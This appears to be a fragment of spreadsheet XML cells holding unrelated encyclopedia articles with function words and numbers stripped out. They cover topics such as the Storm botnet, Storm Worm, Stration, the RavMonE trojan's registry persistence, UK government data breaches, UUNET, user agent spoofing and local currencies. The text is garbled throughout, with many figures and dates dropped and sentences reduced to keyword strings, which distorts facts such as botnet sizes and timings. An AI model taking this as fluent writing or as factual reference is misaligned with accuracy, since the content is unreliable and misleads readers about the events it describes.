prior license interminably; however, access updates latest decryption copy-protection. also anydvd clonecd clonedvd ripper software similar features shrink handbrake k9copy references further reading "appapalooza", computer power user (cpu), october 2009 vol.9 issue pages 60–70 "what's happening", computer power user (cpu), january 2008 vol.8 issue pages 6–11 "what's happening", computer power user (cpu), march 2009 vol.9 issue pages 9–16 "the bleeding edge software", computer power user (cpu), february 2009 vol.9 issue, page external links official website kerr, justin january 2009). "slysoft plays mouse continues war". maximum archived original april 2010. felten, november 2007). "slysoft commercializes next-gen circumvention". freedom tinker. murph, darren october 2007). "slysoft claims cracked bd+, naysayers fall quiet". engadget archived original october 2007. demerjian, charlie december 2008). "slysoft re-cracks that mighty quick". inquirer. archived original august 2010.{{cite web}}: maint: unfit (link) elaborate bytes</t>
  </si>
  <si>
    <t>United Kingdom government security breaches</t>
  </si>
  <si>
    <t>this page time-line published security lapses committed governmental entities including data security breaches. this article attempt capture security vulnerabilities. timeline 1980s 1990s 2000s december 2004 undercover journalist reportedly entered restricted areas walked unchecked unnoticed around passenger aircraft take london heathrow airport. journalist also entered british airways offices out-of-bounds areas london airport housed confidential security documents. april 2007 medical training application service (mtas) on-line application system selection junior doctors, allocating jobs personal details (including phone numbers, home addresses sexual orientation) junior doctors became publicly available several hours anyone right url. also reported applicants able other's files changing digits personalised address given individual, mtas system eventually suspended. july 2007 newcastle city council admitted personal data payment card details 54,000 local residents downloaded insecure server address outside country. stolen data included names, addresses card details transactions february 2006 april 2007, mainly payment council tax, business rates, parking fines council housing rent. october 2007 laptop containing sensitive financial details customers several financial institutions stolen revenue customs employee earlier month laptop protected complex password level encryption". theft also involved printout names financial details. november 2007 discs containing information million british citizens disappeared sent courier used revenue customs office. junior bureaucrat sent discs post revenue customs national audit office london. discs believed contain names, addresses, dates birth, national insurance numbers cases banking details million adults children.</t>
  </si>
  <si>
    <t>Salt Spring dollar</t>
  </si>
  <si>
    <t>salt spring dollar local currency issued salt spring island monetary foundation promote local history, goodwill salt spring island, british columbia, canada. history roundtable discussions sustainable salt spring island coalition examined possible establishment local currency fall 2000. july 2001, salt spring island monetary foundation established registered province british columbia. currency first issued september 2001. 2006, spring island monetary foundation began planning first silver coin edition. first coins minted issued december 2007. currency bills were, still are, issued $$1, $$2, $$5, $$10, $$20, $$50, $$100 denominations. each bears image distinct figure salt spring history, henry wright bullock ($$1 bill), matilda naukana harris ($$2 bill), sylvia stark ($$5 bill). along figure quote albert einstein: "how wish somewhere existed island wise good will! place even would ardent patriot." centres landscape shots various locations island. reverse bills feature paintings local artists including robert bateman. salt spring dollar exchanged canadian dollar, used businesses throughout island. they given distinct symbol denote salt spring island issued. salt spring island monetary foundation backs currency canadian dollars. sources saltspring dollars website saltspring chamber commerce</t>
  </si>
  <si>
    <t>Santiago Mexquititlán raid</t>
  </si>
  <si>
    <t>march 2006, plainclothes agents mexico's federal investigations agency (afi) raided market santiago mexquititlán, querétaro, search unauthorized copies copyrighted works. agents later alleged held hostage vendors raid. three women convicted alleged kidnapping. september 2009, jacinta francisco marcial april 2010 alberta alcántara teresa gonzález, released prison charges dropped. allegations kidnapping during raid, agents cornered number unarmed vendors protest. agents later claimed vendors demanded ransom local witnesses incident denied ransom demand made. jacinta francisco marcial jacinta francisco marcial, indigenous otomí woman, sold cream santiago mexquititlán's predominantly indigenous tianguis.the agents conducted raid implicated francisco marcial shown newspaper photograph depicting walking near group protesting vendors. august 2006, four months raid, arrested alleged kidnapping. later convicted sentenced twenty-one years' imprisonment.amnesty international denounced francisco marcial's imprisonment resulting wrongful prosecution. group declared prisoner conscience, claiming credible evidence her, prosecuted gender, poverty, race, inability speak understand spanish language.in 2009, prosecutors dropped case francisco marcial. september 2009, released. april 2010 mexican supreme court unanimously agreed reverse convictions women convicted charges, alberta alcántara teresa gonzález, released prison. references libertad para jacinta francisco marcial (flv) spanish). amnesty international. 2009-08-19. archived original 2021-12-21. retrieved 2009-09-19.</t>
  </si>
  <si>
    <t>Sarafu-Credit</t>
  </si>
  <si>
    <t>sarafu-credit (sarafu kiswahili word 'currency') community currency system operated kenya. used five different communities, located informal settlements slum areas, including small businesses schools.the community currency system takes form paper notes, circulating alongside national currency, kenyan shilling. aims fostering local trade mobilizing under-used resources, satisfying basic needs (such accessing food paying school fees) allowing users trade even national currency scarce. adoption community currency generated average increase participating businesses' incomes. using communities, local food purchases done using community currency. field studies also shown sarafu-credit usage positively correlated increasing levels trust among community members.such monetary innovation designed beyond official development assistance, considering nature money credit alternatives created.the sarafu-credit system developed implemented kenyan-based non-profit foundation called grassroots economics. history first complementary currency introduced kenya eco-pesa, founded will ruddick. complementary currency kongowea, mombasa county, circulation august 2009 november 2010, part donor-funded environmental project. instead directly spending donor funds, complementary currency allowed realize projects' objectives well boosting local economy. beside collection tonnes waste creation three youth-led community tree nurseries, eco-pesa resulted average increase participating businesses' incomes.after success project, followed bangla-pesa 2013. will ruddick, caroline dama four program members falsely accused undermining kenyan schilling charges dropped investigations petition signed academics hague support program. local groups 2017, communities currently using sarafu-credit kenya totaling 1200 users. system them, though community uses version sarafu-credit, giving unique name depending local toponyms, managing independently. south-africa, community currencies taken inspiration sarafu-credit model consulted grassroots economics foundation: k'mali berg-rand. sarafu (currency) model model consists implementation stages steps outlined below. asset development phase community currency local asset ownership regional markets references</t>
  </si>
  <si>
    <t>Stration</t>
  </si>
  <si>
    <t>stration (also known stratio warezov) family computer worms affect computers running microsoft windows, disabling security features propagating computers e-mail attachments. this family worms unusual variants produced unprecedented rate, estimated every minutes peak, downloaded remote servers infected machines speed propagation. this makes detection removal particular challenge anti-virus software vendors, signature files variant need issued allow software detect them. details first variant stration family reported late september 2006. quickly discovered worm program, well propagating sending copies e-mail, downloading variants number remote servers. these variants generated program servers control worm's creator(s). computer security firm f-secure worked isps shut domains hosting variants worm. november 2006, stration worm widespread malware infection reported, accounting around one-third reported infections.the stration worms employ social engineering infect target machine arriving e-mail masquerading report mail server informing recipient somewhat broken english) computer infected unpatched security flaw windows, offering attachment purported fix, fact worm program itself. some later variants worm spread instant messenger skype chat alerts containing leading worm. notes</t>
  </si>
  <si>
    <t>Stealth Falcon</t>
  </si>
  <si>
    <t>stealth falcon cybercrime group affiliated united arab emirates (uae) associated project raven.the nickname "stealth falcon" given group citizen lab.the group known deploy spear-phishing attacks journalists human rights activists. group uses variety attack vectors, including powershell macros, shorteners, social engineering. also darkmatter (emirati company) references</t>
  </si>
  <si>
    <t>Storm botnet</t>
  </si>
  <si>
    <t>storm botnet storm worm botnet (also known dorf botnet ecard malware) remotely controlled network "zombie" computers "botnet") linked storm worm, trojan horse spread e-mail spam. height september 2007, storm botnet running anywhere million million computer systems, accounted malware microsoft windows computers. first identified around january 2007, distributed email subjects "230 dead storm batters europe," giving well-known name. botnet began decline late 2007, mid-2008 reduced infecting 85,000 computers, less infected year earlier.as december 2012, original creators storm found. storm botnet displayed defensive behaviors indicated controllers actively protecting botnet attempts tracking disabling specifically attacking online operations security vendors researchers attempted investigate security expert stewart revealed late 2007, operators botnet began decentralize operations, possible plans sell portions storm botnet operators. reportedly powerful enough force entire countries internet, estimated capable executing instructions second world's supercomputers. united states federal bureau investigation considered botnet major risk increased bank fraud, identity theft, cybercrimes. origins first detected internet january 2007, storm botnet worm so-called storm-related subject lines infectious e-mail employed initially, "230 dead storm batters europe." later provocative subjects included "chinese missile shot aircraft", "u.s. secretary state condoleezza rice kicked german chancellor angela merkel." suspected information security professionals well-known fugitive spammers, including kuvayev, involved operation control storm botnet. according technology journalist daniel tynan, writing "robert cringely" pseudonym, great portion fault existence storm botnet microsoft adobe systems. other sources state storm worm's primary method victim acquisition enticing users frequently changing social engineering (confidence trickery) schemes. according patrick runald, storm botnet strong american focus, likely agents working support within united states. some experts, however, believe storm botnet controllers russian, pointing specifically russian business network, citing storm software mentions hatred moscow-based security firm kaspersky lab, includes russian word "buldozhka," means "bulldog." composition botnet, zombie network, comprises computers running microsoft windows operating system. once infected, computer becomes known bot. this performs automated tasks—anything gathering data user, attacking sites, forwarding infected e-mail—without owner's knowledge permission. estimates indicate 5,000 6,000 computers dedicated propagating spread worm e-mails infected attachments; billion virus messages sent botnet september 2007, including record million august 2007 alone. lawrence baldwin, computer forensics specialist, quoted saying, "cumulatively, storm sending billions messages day. could double digits billions, easily." methods used entice victims infection-hosting sites offers free music, artists beyoncé knowles, kelly clarkson, rihanna, eagles, fighters, kelly, velvet revolver. signature-based detection, main defense computer systems virus malware infections, hampered large number storm variants.back-end servers control spread botnet storm worm automatically re-encode distributed infection software twice hour, transmissions, making difficult anti-virus vendors stop virus infection spread. additionally, location remote servers control botnet hidden behind constantly changing technique called 'fast flux', making difficult find stop virus hosting sites mail servers. short, name location machines frequently changed rotated, often minute minute basis. storm botnet's operators control system peer-to-peer techniques, making external monitoring disabling system difficult. there central "command-and-control point" storm botnet shut down. botnet also makes encrypted traffic. efforts infect computers usually revolve around convincing people download e-mail attachments contain virus subtle manipulation. instance, botnet's controllers took advantage national football league's opening weekend, sending mail offering "football tracking programs" nothing infect user's computer. according matt sergeant, chief anti-spam technologist messagelabs, terms power, [the botnet] utterly blows supercomputers away. supercomputers, blows away million machines. it's frightening criminals access much computing power, there's much it." estimated –20% total capacity power storm botnet currently used.computer security expert stewart detailed process compromised machines join botnet: attempts join botnet made launching series files compromised machine, stages. usually, named sequence game0.exe game5.exe, similar. continue launching executables turn. they typically perform following: game0.exe backdoor/downloader game1.exe smtp relay game2.exe e-mail address stealer game3.exe e-mail virus spreader game4.exe distributed denial service (ddos) attack tool game5.exe updated copy storm worm dropperat stage compromised system connect botnet; fast flux makes tracking process exceptionally difficult. this code %windir%\system32\wincom32.sys windows system, kernel rootkit, connections back botnet sent modified version edonkey/overnet communications protocol. method storm botnet variants employ variety attack vectors, variety defensive steps exist well. storm botnet observed defending itself, attacking computer systems scanned storm virus-infected computer systems online. botnet defend ddos counter-attacks, maintain internal integrity. certain points time, storm worm used spread botnet attempted release hundreds thousands versions onto internet, concentrated attempt overwhelm defenses anti-virus malware security firms. according joshua corman, security researcher, "this first time remember ever seeing researchers actually afraid investigating exploit." researchers still unsure botnet's defenses counterattacks form automation, manually executed system's operators. attach debugger, query sites reporting into, knows punishes instantaneously. [over secureworks, chunk ddos-ed [distributed-denial-of-service attacked] researcher network. every time hear investigator trying investigate, they're automatically punished. knows investigated, punishes them. fights back", corman said.spameater.com well sites 419eater.com artists against 419, deal spam e-mail fraud, experienced ddos attacks, temporarily rendering completely inoperable. ddos attacks consist making massed parallel network calls target addresses, overloading servers' capacities preventing responding requests. other anti-spam anti-fraud groups, spamhaus project, also attacked. webmaster artists against said website's server succumbed attack increased 100mbit. similar attacks perpetrated dozen anti-fraud site hosts. jeff chan, spam researcher, stated, terms mitigating storm, challenging best impossible worst since guys control many hundreds megabits traffic. there's evidence control hundreds gigabits traffic, enough force countries internet."the storm botnet's systems also take steps defend locally, victims' computer systems. botnet, compromised systems, creates computer process windows machine notifies storm systems whenever program processes begin. previously, storm worms locally would tell programs—such anti-virus, anti-malware software, simply run. however, according security research, versions storm also simply "fool" local computer system thinking hostile program successfully, fact, anything. "programs, including exes, dlls files, also software applications bearshare edonkey, appear successfully, even though actually anything, less suspicious process gets terminated suddenly outside", said richard cohen sophos. compromised users, related security systems, assume security software running successfully fact not.on september 2007, republican party website united states compromised, used propagate storm worm botnet. october 2007, botnet took advantage flaws youtube's captcha application mail systems, send targeted spam e-mails xbox owners scam involving winning special version video game halo other attack methods include using appealing animated images laughing cats people click trojan software download, tricking users yahoo!'s geocities service download software claimed needed geocities itself. geocities attack particular called "full-fledged attack vector" paul ferguson trend micro, implicated members russian business network, well-known spam malware service. christmas 2007, storm botnet began sending holiday-themed messages revolving around male interest women, titles "find some christmas tail", "the twelve girls christmas", "mrs. claus tonight!" photos attractive women. described attempt draw unprotected systems botnet boost size holidays, security updates protection vendors take longer distributed. e-mails christmas strippers distributed, storm botnet operators immediately began sending infected e-mails claimed wish recipients "happy year 2008!"in january 2008, botnet detected first time involved phishing attacks major financial institutions, targeting barclays halifax. encryption sales around october 2007, uncovered portions storm botnet variants could sale. this done using unique security keys encryption botnet's internet traffic information. unique keys allow segment, sub-section storm botnet, communicate section matching security key. however, also allow people detect, track, block storm botnet traffic future, security keys unique lengths signatures. computer security vendor sophos agreed assessment partitioning storm botnet indicated likely resale services. graham cluley sophos said, "storm's encrypted traffic interesting feature raised eyebrows lab. likely cybercriminals lease portions network misuse. surprise network used spamming, distributed denial-of-service attacks, malicious activities." security experts reported storm broken malware market, form "ready-to-use botnet-making spam kit", world could sharp rise number storm related infections compromised computer systems. encryption seems affect systems compromised storm second week october 2007 onwards, meaning computer systems compromised time frame remain difficult track block.within days discovery segmenting storm botnet, spam e-mail subsection uncovered major security vendors. evening october security vendors began seeing spam embedded sound files, attempted trick victims investing penny stock, part illegal pump-and-dump stock scam. believed first-ever spam e-mail scam made audio fool victims. unlike nearly storm-related e-mails, however, audio stock scam messages include sort virus storm malware payload; simply part stock scam.in january 2008, botnet detected first time involved phishing attacks customers major financial institutions, targeting banking establishments europe including barclays, halifax royal bank scotland. unique security keys used indicated f-secure segments botnet leased. claimed decline botnet september 2007, estimated microsoft update windows malicious software removal tool (msrt) helped reduce size botnet 20%. patch, claimed microsoft, removed storm approximately 274,372 infected systems million scanned windows systems. however, according senior security staff microsoft, "the 180,000+ additional machines cleaned msrt since first likely home user machines notably incorporated daily operation 'storm' botnet," indicating msrt cleaning symbolic best.as late october 2007, reports indicated storm botnet losing size internet footprint, significantly reduced size. brandon enright, university california diego security analyst, estimated botnet late october fallen size approximately 160,000 compromised systems, enright's previous estimated high july 2007 1,500,000 systems. enright noted, however, botnet's composition constantly changing, still actively defending attacks observation. researcher pages hosting malware much… automated process automatically launches denial service [attack] you", said, added research caused storm botnet attack knocked part diego network offline.the computer security company mcafee reported saying storm worm would basis future attacks. craig schmugar, noted security expert discovered mydoom worm, called storm botnet trend-setter, usage similar tactics criminals. derivative botnet dubbed "celebrity spam gang", similar technical tools storm botnet controllers. unlike sophisticated social engineering storm operators entice victims, however, celebrity spammers make offers nude images celebrities angelina jolie britney spears. cisco systems security experts stated report believe storm botnet would remain critical threat 2008, said estimated size remained "millions".as early 2008, storm botnet also found business competition black economy, form nugache, another similar botnet first identified 2006. reports indicated price underway operators botnets, sale spam e-mail delivery. following christmas year's holidays bridging 2007–2008, researchers german honeynet project reported storm botnet increased size holidays. messagelabs intelligence report dated march 2008 estimates spam internet originates storm. present state botnet storm botnet sending spam years decline late 2008. factor this—on account making less interesting creators maintain botnet—may stormfucker tool, made possible take control parts botnet. stormbot april 2010, mcafee made announcement so-called "rumors" stormbot verified. mark schloesser, tillmann werner, felix leder, german researchers work analyzing original storm, found around two-thirds "new" functions copy paste last storm code base. thing missing infrastructure, perhaps tool used bring original storm. honeynet blog dubbed stormbot also alureon bagle (computer worm) botnet conficker e-mail spam gameover zeus helpful worm internet crime internet security mccolo operation: roast rustock botnet regin (malware) srizbi botnet zombie (computer science) zeroaccess botnet zeus (malware) references external links video released secure labs, showing spread botnet youtube "the storm worm: certain machine infected?" target page longer website. "trustedsource storm tracker": storm domains latest proxies target page longer website.</t>
  </si>
  <si>
    <t>UUNET</t>
  </si>
  <si>
    <t>uunet, founded 1987, largest internet service providers early tier networks. based northern virginia first commercial internet service providers. today, uunet internal brand verizon business (formerly mci). history background prior founding, access usenet e-mail exchange non-arpanet sites accomplished using cooperative network systems running uucp protocol pots lines. during mid-1980s, growth network began considerable strain resources voluntarily provided larger uucp hubs. this prompted rick adams, system administrator center seismic studies, explore possibilities providing services commercially reduce burden existing hubs. early existence with funding form loan usenix, uunet communications services began operations 1987 non-profit corporation providing usenet feeds, e-mail exchange, access large repository software source code related information. venture proved successful shed non-profit status within years. time, company changed name uunet technologies. 1990, uunet launched alternet service, provided access backbone independent constraints operated government. that network lives much larger form serves core products include access dial-up broadband speeds well hosting. uunet raised million accel partners, menlo ventures, enterprise associates 1993 $8.2 million 1996 expanding network hiring executives experience marketing.in mid-1990s, uunet fastest-growing isp, outpacing sprint. peak, internet traffic briefly doubling every months, translates growth year. however, continuing uunet claims growth (long fallen lower, albeit still substantial levels) artificially fueled expectations dot-com telecom companies late 1990s, leading dot-com bubble crash 2000/2001. mergers acquisitions 1996, uunet acquired april 1996. this independent acquisition unrelated acquisition worldcom. however, public company acquisition made company wall street darling, likely influenced worldcom's decision pursue mfs.in 1996, uunet acquired worldcom august 1996, part worldcom's purchase communications company.in 2001, uunet fully integrated worldcom name dropped official documents. 2002, owner uunet time (worldcom) filed largest chapter bankruptcy protection history. 2005, internet service infrastructure, assigned as701, maintained highest outdegree isp. verizon 2006, worldcom purchased verizon communications operates verizon business name. spam spewspewnet after sold resold onset dot-com bubble, uunet acquired nickname spewspewnet. this nickname given uunet become home many distributors spam, including distributors newsgroup spam e-mail spam. uunet also became known providing bulletproof hosting many pages whose chief form advertisement spam. because uunet started loan usenix controlled e-mail addresses moderated usenet groups, hard block email traffic usenet. 1997, uunet lost much credit august, finding alternate routes moderated newsgroups, usenet death penalty (udp) issued uunet. week later, lifted. 1998 uunet threatened legal action hosting image "spamunet" timeline 1987 uunet communications services founded passes first traffic compuserve network using uucp (unix unix copy protocol). 1989 uunet becomes for-profit corporation 1990 uunet launches alternet 1991 uunet participates founding commercial internet exchange association 1992 uunet co-creates mae-east, time world's busiest internet exchange "center internet" 1994 microsoft paid $16.4 million percent share company 1995 may, uunet listed nasdaq stock market initial public offering would become part beginning dot-com boom. 1995 uunet technologies places takeover unipalm pipex. 1996 uunet technologies agreed merger microsoft backed communications company. 1996 metropolitan fiber systems (mfs) acquires uunet billion august 1996. this marked uunet stopped existing independent company. 1996 worldcom acquires year's dec. 11:58 $12.4 billion 1997 usenet death penalty (udp) issued uunet, lifted week later 1997 november, worldcom announced us$37 billion merger including combining internetmci uunet internet operations. 1998 combined worldcom opens business september given go-ahead doj, subsequent divesting internet mci. 1998 worldcom acquires compuserve network services block communications aol. both become part uunet 1999. 1999 october, worldcom announces intentions sprint $129 billion. 2000 european commission denied worldcom sprint merger antitrust grounds. 2001 uunet brand folded worldcom's product line disappears 2002 worldcom files chapter bankruptcy protection result massive billion accounting scandal. 2003 uunet brand re-emerges worldcom's wholesale-only brand. 2004 worldcom emerges chapter bankruptcy renames mci, still using uunet brand wholesale business. 2005 drops uunet brand wholesale business. name longer use. 2006 verizon acquires mci, including uunet subsidiary, known verizon business. as701 remains backbone verizon business although origin dates back 1990 uunet flag. also list companies headquartered northern virginia references external links o'reilly discusses uunet open source-derived business. includes history. discussions uunet spam news:news.admin.net-abuse.email. usenet message comp.org.usenix announcing uunet creation 1987) estimated spam business uunet</t>
  </si>
  <si>
    <t>User agent spoofing</t>
  </si>
  <si>
    <t>computing, user agent software, acting behalf user, "retrieves, renders facilitates end-user interaction content". user agent therefore special kind software agent. some prominent examples user agents browsers email readers. often, user agent acts client client–server system. contexts, within session initiation protocol (sip), term user agent refers points communications session. user agent identification when software agent operates network protocol, often identifies itself, application type, operating system, device model, software vendor, software revision, submitting characteristic identification string operating peer. http, sip, nntp protocols, identification transmitted header field user-agent. bots, crawlers, often also include and/or e-mail address webmaster contact operator bot. http http, user-agent string often used content negotiation, origin server selects suitable content operating parameters response. example, user-agent string might used server choose variants based known capabilities particular version client software. concept content tailoring built http standard 1945 "for sake tailoring responses avoid particular user agent limitations". user-agent string criteria crawlers excluded accessing certain parts website using robots exclusion standard (robots.txt file). many http request headers, information "user-agent" string contributes information client sends server, since string vary considerably user user. format human-operated browsers user-agent string format currently specified section 10.1.5 http semantics. format user-agent string http list product tokens (keywords) optional comments. example, user's product called wikibrowser, user agent string might wikibrowser/1.0 gecko/1.0. "most important" product component listed first. parts string follows: product name version (wikibrowser/1.0) layout engine version (gecko/1.0)during first browser war, many servers configured send pages required advanced features, including frames, clients identified version mozilla only. other browsers considered older products mosaic, cello, samba, would sent bare bones html document. reason, browsers user-agent string value follows: example, safari ipad used following: mozilla/5.0 (ipad; 3_2_1 like en-us) applewebkit/531.21.10 (khtml, like gecko) mobile/7b405 components string follows: mozilla/5.0: previously used indicate compatibility mozilla rendering engine. (ipad; 3_2_1 like en-us): details system browser running. applewebkit/531.21.10: platform browser uses. (khtml, like gecko): browser platform details. mobile/7b405: this used browser indicate specific enhancements available directly browser third parties. example microsoft live meeting registers extension live meeting service knows software already installed, means provide streamlined experience joining meetings.before migrating chromium code base, opera widely used browser user-agent string "mozilla" (instead beginning "opera"). since july 2013, opera's user-agent string begins "mozilla/5.0" and, avoid encountering legacy server rules, longer includes word "opera" (instead using string "opr" denote opera version). format automated agents (bots) automated crawling tools simplified form, important field contact information case problems. convention word "bot" included name agent. example: googlebot/2.1 (+http://www.google.com/bot.html) automated agents expected follow rules special file called "robots.txt". user agent spoofing popularity various browser products varied throughout web's history, influenced design websites websites sometimes designed work well particular browsers, rather according uniform standards world wide consortium (w3c) internet engineering task force (ietf). websites often include code detect browser version adjust page design sent according user agent string received. this mean less-popular browsers sent complex content (even though might able deal correctly) extreme cases, refused content. thus, various browsers feature cloak spoof identification force certain server-side content. example, android browser identifies safari (among things) order compatibility.other http client programs, like download managers offline browsers, often ability change user agent string. result user agent spoofing collected statistics browser usage inaccurate. user agent sniffing user agent sniffing practice websites showing different adjusted content viewed certain user agents. example microsoft exchange server 2003's outlook access feature. when viewed internet explorer newer, functionality displayed compared page browsers. user agent sniffing considered poor practice, since encourages browser-specific design penalizes browsers unrecognized user agent identifications. instead, recommends creating standard html markup, allowing correct rendering many browsers possible, test specific browser features rather particular browser versions brands.websites intended display mobile phones often rely user agent sniffing, since mobile browsers often differ greatly other. encryption strength notations browsers created united states, netscape navigator internet explorer, previously used letters specify encryption strength user agent string. until 1996, united states government allowed encryption keys longer bits exported, vendors shipped various browser versions different encryption strengths. stands "usa" (for version 128-bit encryption), stands "international" browser 40-bit encryption used anywhere world stands facto) "none" encryption). following lifting export restrictions, vendors supported 256-bit encryption. deprecation user-agent header 2020, google announced would phasing support user-agent header google chrome browser. they stated major browser vendors supportive move, know vendors would follow suit. google stated feature called client hints would replace functionality user-agent string. also robots exclusion standard crawler wireless universal resource file (wurfl) user agent profile (uaprof) browser sniffing browser engine references</t>
  </si>
  <si>
    <t>Storm Worm</t>
  </si>
  <si>
    <t>storm worm (dubbed finnish company f-secure) phishing backdoor trojan horse affects computers using microsoft operating systems, discovered january 2007. worm also known small.dam trojan-downloader.win32.small.dam (f-secure) cme-711 (mitre) w32/nuwar@mm downloader-bai (specific variant) (mcafee) troj/dorf mal/dorf (sophos) trojan.dl.tibs.gen!pac13 trojan.downloader-647 trojan.peacomm (symantec) troj_small.edw (trend micro) win32/nuwar (eset) win32/nuwar.n@mm!cme-711 (windows live onecare) w32/zhelatin (f-secure kaspersky) trojan.peed, trojan.tibs (bitdefender)the storm worm began attacking thousands (mostly private) computers europe united states friday, january 2007, using e-mail message subject line recent weather disaster, "230 dead storm batters europe". during weekend subsequent waves attack. january 2007, storm worm accounted malware infections globally.there evidence, according pcworld, storm worm russian origin, possibly traceable russian business network. ways action originally propagated messages european windstorm kyrill, storm worm seen also emails following subjects: dead storm batters europe. [the worm dubbed "storm" message subject.] killer he's free kill again! u.s. secretary state condoleezza rice kicked german chancellor angela merkel british muslims genocide naked teens attack home director. your text radical muslim drinking enemies' blood. chinese/russian missile shot russian/chinese satellite/aircraft saddam hussein safe sound! saddam hussein alive! venezuelan leader: "let's beginning". fidel castro dead. knew facebook occupies iranwhen attachment opened, malware installs wincom32 service, injects payload, passing packets destinations encoded within malware itself. according symantec, also download trojan.abwiz.f trojan, w32.mixor.q@mm worm. trojan piggybacks spam names "postcard.exe" "flash postcard.exe," changes original wave attack mutates. some known names attachments include: postcard.exe ecard.exe fullvideo.exe full story.exe video.exe read more.exe fullclip.exe greetingpostcard.exe morehere.exe flashpostcard.exe greetingcard.exe clickhere.exe readmore.exe flashpostcard.exe fullnews.exe nflstattracker.exe arcadeworld.exe arcadeworldgame.exelater, f-secure confirmed, malware began spreading subjects "love birds" "touched love". these emails contain links websites hosting following files, confirmed contain virus: with_love.exe withlove.exe love.exe frommetoyou.exe iheartyou.exe fck2008.exe fck2009.exeaccording stewart, director malware research secureworks, storm remains amazingly resilient, part trojan horse uses infect systems changes packing code every minutes, and, installed, uses fast flux change addresses command control servers. botnetting compromised machine becomes merged botnet. while botnets controlled central server, found taken destroy botnet, storm worm seeds botnet acts similar peer-to-peer network, centralized control. each compromised machine connects list subset entire botnet around compromised machines, hosts. while infected hosts share lists infected hosts, machine full list entire botnet subset, making difficult gauge true extent zombie network. september 2007, estimates size storm botnet ranged million computers. researchers university mannheim institut eurecom estimated concurrent online storm nodes 5,000 40,000. rootkit another action storm worm takes install rootkit win32.agent.dh. symantec pointed flawed rootkit code voids storm worm author's plans. later variants, starting around july 2007, loaded rootkit component patching existing windows drivers tcpip.sys cdrom.sys stub code loads rootkit driver module without requiring entry windows driver list. april fool's april 2008, storm worm released onto net, april fools-themed subject titles. feedback list antivirus companies detect storm worm include authentium, bitdefender, clamav, esafe, eset, f-prot, f-secure, kaspersky, mcafee, sophos, symantec, trend micro, avast! windows live onecare. storm worm constantly updated authors evade antivirus detection, imply vendors listed able detect storm worm variants. intrusion detection system offers protection rootkit, warn windows process "services.exe" trying access internet using ports 4000 7871. windows 2000, windows presumably windows vista infected storm worm variants, windows server 2003 cannot, malware's author specifically excluded edition windows code. additionally, decryption layer variants requires windows functions available windows service pack later, effectively preventing infection older versions windows. peter gutmann sent email noting storm botnet comprises million depending whose estimates believe. although gutmann makes hardware resource comparison storm botnet distributed memory distributed shared memory high performance computers top500, exact performance matches intention—rather general appreciation botnet's size compared massive computing resources. consider example size storm botnet compared grid computing projects world community grid. article pcworld dated october 2007 says network security analyst presented findings toorcon hacker conference diego october 2007, saying storm 20,000 active hosts one-tenth former size. however, disputed security researcher bruce schneier, notes network partitioned order sell parts independently. notes external links spamtrackers spamwiki: storm networkworld: storm worm's virulence change tactics wired.com: analysis bruce schneier "there's storm coming", x-force blog trojan.peacomm (storm) symantec stormy weather: quantitative assessment storm threat 2007 (trend micro) millions windows, perfect storm gathering, observer. april fool's storm worm attack hits, world. storm future social engineering help security (hns). bodmer, kilger, carpenter, jones (2012). reverse deception: organized cyber threat counter-exploitation. york: mcgraw-hill osborne media. isbn 0071772499, isbn 978-0071772495</t>
  </si>
  <si>
    <t>Stealware</t>
  </si>
  <si>
    <t>stealware refers type malware covertly transfers money data third party. specifically, stealware uses http cookie redirect commission ordinarily earned site referring users another site. references external links definition spyware.co.uk</t>
  </si>
  <si>
    <t>RavMonE.exe</t>
  </si>
  <si>
    <t>ravmone, also known rjump, trojan opens backdoor computers running microsoft windows. once computer infected, virus allows unauthorized users gain access computer's contents. this poses security risk infected machine's user, attacker steal personal information, computer access point internal network. ravmone made famous september 2006 number ipod videos shipped virus already installed. because virus infects windows computers, inferred apple's contracted manufacturer using macintosh computers. apple came public criticism releasing virus product. description ravmone worm written python scripting language converted windows executable file using py2exe tool. attempts spread copying mapped removable storage drives. transmitted opening infected email attachments downloading infected files internet. also spread removable media, cd-roms, flash memory, digital cameras multimedia players. action once virus executed, performs following tasks. copies %windir% ravmone.exe. adds value "ravav" "%windir%\ravmone.exe" registry hkey_local_machine\software\microsoft\windows\currentversion\run. opens random port accepts remote commands. creates file ravmonlog store port number. posts http request advise attacker infected computer's address number port opened.when removable storage device connected infected computer copies following files device: autorun.inf script execute worm next time device connected computer msvcr71.dll case target device lacks support, microsoft runtime library module containing standard functions copy memory print console ravmon.exe copy worm aliases backdoor.rajump (symantec) w32/jisx.a.worm (panda) w32/rjump-c (sophos) w32/rjump.a!worm (fortinet) win32/rjump.a (eset) win32/rjump.a!worm (ca) worm.rjump.a (bitdefender) worm.win32.rjump.a (kaspersky) worm/rjump.e (avira) worm_siweol.b (trendmicro) worm/generic.amr (avg) inf:rjump[trj](avast!) also list computer viruses (l-r) references external links alphabetically publisher: "avira virus definition file history". avira. 2006. w32/rjump. archived original september 2007. "w32/rjump.worm". mcafee. june 2006. w32/rjump. archived original september 2006. "troj/bdoor-dij". sophos. w32/rjump. archived original november 2006. "w32.rajump". symantec. june 2006. w32/rjump. "worm_siweol". trend micro. 2016. w32/rjump. archived original december 2006.</t>
  </si>
  <si>
    <t>Steam Awards</t>
  </si>
  <si>
    <t>steam awards annual user-voted award event video games published valve's steam service. introduced 2016, game nomination voting periods concurrent steam's annual autumn winter holiday sales, centered around holidays thanksgiving christmas. format steam awards selected phases. first phase, valve selects number categories, atypical used gaming awards, allows registered steam user select game available steam category. valve subsequently reviews nominations selects five games final voting. these nominations presented steam users, giving opportunity vote category. following this, valve announces winners. game nomination voting periods concurrent steam's annual autumn winter holiday sales, centered around holidays thanksgiving christmas. awards 2016 nomination process took place november 23–29, 2016. voting took place december 22–30, 2016, winners announced december awards received around million nominations. 2017 nomination process took place november 22–28, 2017. voting took place december 2017, january 2018, winners announced january 2018 nomination process began november 2018. finalists revealed december, winners announced live broadcast steam.tv february 2019. 2019 nomination process began november 2019. finalists revealed starting december 2019, category day. unlike previous years, eligibility awards restricted release date, games released november 2018 able nominated, except "labor love" category. users able vote december 19–31, winners announced final day. 2020 nomination process began november 2020, winners announced january 2021. nominees category announced daily starting december 2020, voting commencing december january 2021 nominees announced december 2021, voting commencing january 2022. references external links official website</t>
  </si>
  <si>
    <t>Ubuntu One</t>
  </si>
  <si>
